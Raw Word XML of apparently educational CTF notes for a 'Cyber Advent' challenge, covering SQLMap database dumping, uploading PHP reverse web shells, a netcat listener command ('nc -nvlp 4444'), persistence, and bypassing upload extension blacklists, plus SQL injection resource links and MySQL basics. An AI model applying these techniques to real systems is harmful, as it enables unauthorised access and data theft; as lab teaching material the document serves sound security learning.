        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>There are various levels of “risk” and “depth” that can be configured for SQLMap, should no possible SQLis be detected at lower levels. Sometimes the tool may find a sub-optimal SQLi (for example, a very slow timing attack) for scenarios where faster SQLis exist. This may occur in this Cyber Advent challenge if you decide to use the tool (try flushing the session, forcing a dbms and increasing the risk and/or level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D11EA03" w14:textId="5F566809" w:rsidR="003C6045" w:rsidRPr="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If you’re unsure as to which tables may exist in one particular database, you may be able to just dump the whole contents of the database using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">--dump </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">option, but it may be much more sensible to target important tables of interest (dumping a whole database with a time-based blind attack may take a long time!). A better technique may involve enumerating the layout of the database (tables), enumerating the column names of a table of interest and from there, extracting information. For example, if you’re looking for a particular user’s email and password and you know their first name, it would make sense to find the table containing this information (users) and extracting only the useful </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>columns you’d want (first_name, email, password). Table names might not be exactly what you expect, hence why it’s generally a good idea to enumerate the layout first, so you don’t waste time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C8CA8" w14:textId="678AE20E" w:rsidR="003C6045" w:rsidRPr="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6045">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Uploading web shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2FC17A" w14:textId="342DC340" w:rsidR="003C6045" w:rsidRPr="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6045">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Beyond SQL injections, it’s even more important to sanitise any files you allow users to upload to a web application! Improperly configured file uploads could leave a server wide-open to an attacker to upload various nefarious scripts, in particular web shells.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E272F" w14:textId="77777777" w:rsidR="003C6045" w:rsidRPr="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6045">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A reverse web-shell is a script that is executed on a target machine which sends out a connection to an attacker-controlled machine. The attacker-controlled machine is then able to execute commands on the target machines, which gives the opportunity for data exfiltration and privilege escalation. There are several web shells included in Kali Linux (</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6045">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/usr/share/webshells/</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6045">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) for a variety of web server languages. These scripts are designed to be easily modified for use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F0CBB9" w14:textId="55BCF3B2" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It’s highlighted we need to change the IP and port for our own usage. This IP and port should be the IP of the attacker machine (i.e. your Kali VM) and the port should be an available port to be used for the reverse-shell connection. 1234 is typically okay to use, 4444 is also another popular option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D880C0" w14:textId="5FB999A2" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Once this file is uploaded to a target machine, it will need to be executed. In the case of a PHP reverse shell, this is usually triggered by navigating to the location of the uploaded PHP script. It is normal (and good news!) for the web page to infinitely load when trying to navigate to the reverse shell script, this usually means the script is successfully running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69814ABC" w14:textId="148432EF" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>So how do we actually control the target machine? We need to have a listener set up for when the reverse shell is run and the connection request is made. The easiest way to do this is to use netcat, which is installed on most pen-testing distributions by default. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D704C" w14:textId="21D722CA" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035B3B25" w14:textId="4F39CF85" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Would set up a listener on port 4444. If the PHP reverse shell is configured to operate on port 4444, your listener would receive the connection request when the script is run on the target machine. If all goes as planned, you will have a command terminal prompt on your screen!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29379668" w14:textId="1FBFFEF7" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The reverse shell is typically fairly basic and the connection is reliant on the web server running the PHP file being run (so try to avoid accidentally closing your tab!). It’s usually a good idea to try and establish persistence and/or upgrade the shell you have to something a bit </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>nicer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). If you lose your reverse shell connection, try and reload the script you uploaded (and hope it hasn’t been deleted by an angry SOC analyst!).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E1F8B7" w14:textId="05BCAE92" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Be wary, developers actively try and prevent this from happening (for good reason) so may blacklist files from being uploaded based on filetype/file extension! You may need to think of alternative formats that bypass blacklists, but are also still interpreted by the web server for execution (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hint hint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>). If you are attempting the challenge and your reverse shell seems to not work (the web server just prints the contents of the uploaded file), this means the web server is not interpreting the file as PHP! Try a different file format, there’s quite a few </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EE6450" w14:textId="31343714" w:rsidR="00D67743" w:rsidRDefault="00D67743" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion and Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31B90E" w14:textId="71DC4A2F" w:rsidR="00D67743" w:rsidRDefault="007A6E65" w:rsidP="00D67743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidR="00D67743" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/payloadbox/sql-injection-payload-list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F66CCC7" w14:textId="7B66D47C" w:rsidR="00D67743" w:rsidRDefault="007A6E65" w:rsidP="00D67743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidR="00D67743" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C18ED97" w14:textId="119000EB" w:rsidR="00D67743" w:rsidRDefault="007A6E65" w:rsidP="00D67743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidR="00D67743" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.sqlinjection.net/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47C38B1D" w14:textId="3C7CE52A" w:rsidR="00D67743" w:rsidRDefault="007A6E65" w:rsidP="00D67743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidR="00D67743" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78C2C729" w14:textId="07F5CD17" w:rsidR="00D67743" w:rsidRDefault="007A6E65" w:rsidP="00D67743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidR="00D67743" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/trietptm/SQL-Injection-Payloads</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FFAA4A2" w14:textId="7941B23B" w:rsidR="00D67743" w:rsidRDefault="007A6E65" w:rsidP="00D67743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidR="00D67743" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C8DCDF3" w14:textId="32A60EE1" w:rsidR="00D67743" w:rsidRPr="00F512ED" w:rsidRDefault="00D67743" w:rsidP="00D67743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00D67743">
        <w:t>https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B87B1B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Understanding MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D579A0B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>What is MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BD6CAB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Relational database management system (RDBMS) based on structured query language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FE9956" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D6171" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Persistent, organized collection of structured data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A006CA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>RDBMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34314BF3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Software or service used to create and manage databases based on a relational model, organized as tables. Every table relates in some way to each others primary key or other key factors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B7793" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E673B7D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>MySQL is a brand name for popular RDBMS software implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7961F243" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Client-server model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D97FBF6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>How does MySQL work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9DD85" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Consists of server and utility programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A3DFEE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Handles all database instructions like creating, editing, and accessing data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D2722B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Receives and manages requests and communicates using MySQL protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0272CB1E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>MySQL creates a database for storing and manipulating data, defining the relationship of each table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E6FC2B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Clients make requests by making specific statements in SQL</w:t>
      </w:r>
    </w:p>
